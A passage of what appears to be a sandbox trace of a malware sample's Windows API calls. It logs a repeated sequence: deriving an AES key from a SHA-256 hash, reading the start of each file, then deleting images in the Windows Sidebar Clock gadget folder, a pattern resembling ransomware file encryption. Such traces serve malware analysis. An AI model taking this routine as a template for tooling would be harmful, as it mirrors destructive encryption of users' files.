out: phHash=0x326a4d0) returned 1 [0187.702] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.702] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.702] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6 [0187.702] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.703] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.703] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.703] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.704] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_left.png")) returned 0 [0187.705] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.706] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.706] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.706] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.706] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa8 [0187.706] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.707] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.708] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.708] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.709] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_right.png")) returned 0 [0187.710] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.710] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.710] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.710] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.710] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x83 [0187.711] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.712] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.712] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.712] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.713] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider.png")) returned 0 [0187.714] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.715] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.715] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.715] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.715] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x91 [0187.715] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.716] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.716] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.716] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.718] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_left.png")) returned 0 [0187.719] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.720] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.720] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.720] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.720] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8b [0187.720] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.721] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.721] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.721] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.723] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_right.png")) returned 0 [0187.730] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.731] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.731] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.731] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.731] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b9 [0187.731] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.733] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.733] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.733] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.736] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_disabled.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_disabled.png")) returned 0 [0187.736] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.737] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.737] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.737] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.737] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41a [0187.737] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.739] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.739] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.739] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.740] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_hover.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_hover.png")) returned 0 [0187.742] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.742] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.742] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.742] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.742] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x464 [0187.742] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.751] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.751] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.751] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.753] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png")) returned 0 [0187.754] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.754] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.754] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.754] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.754] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x357 [0187.754] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.756] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.756] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.756] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.758] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png")) returned 0 [0187.772] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.773] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.773] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.773] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.773] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b9 [0187.773] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.775] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.775] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.775] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.776] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_disabled.png")) returned 0 [0187.777] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.778] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.778] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.778] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.778] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x417 [0187.778] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.780] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.780] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.780] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.782] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_hover.png")) returned 0 [0187.783] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.784] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.784] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.784] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.784] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x45f [0187.784] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.786] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.786] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.786] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.787] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_pressed.png")) returned 0 [0187.791] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.792] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.792] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.792] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.792] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x358 [0187.792] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.797] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.797] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.797] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.798] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_rest.png")) returned 0 [0187.799] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.800] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.800] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.800] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.800] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x120 [0187.800] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.801] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.801] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.801] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.803] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\spacer_highlights.png")) returned 0 [0187.803] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.804] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.804] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.804] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.804] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4eac [0187.804] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.807] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.807] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.807] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.808] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square.png")) returned 0 [0187.809] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.810] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.810] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.810] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.810] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf0 [0187.810] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.811] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.811] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.811] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.812] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_dot.png")) returned 0 [0187.813] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.813] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.813] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.813] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.813] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1db [0187.813] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.815] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.815] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.815] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.816] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_h.png")) returned 0 [0187.817] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.818] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.818] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.818] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.818] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ca [0187.818] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.820] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.820] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.820] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.821] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_m.png")) returned 0 [0187.821] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.822] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.822] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.822] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.822] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2f [0187.822] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.824] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.824] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.824] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.825] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png" 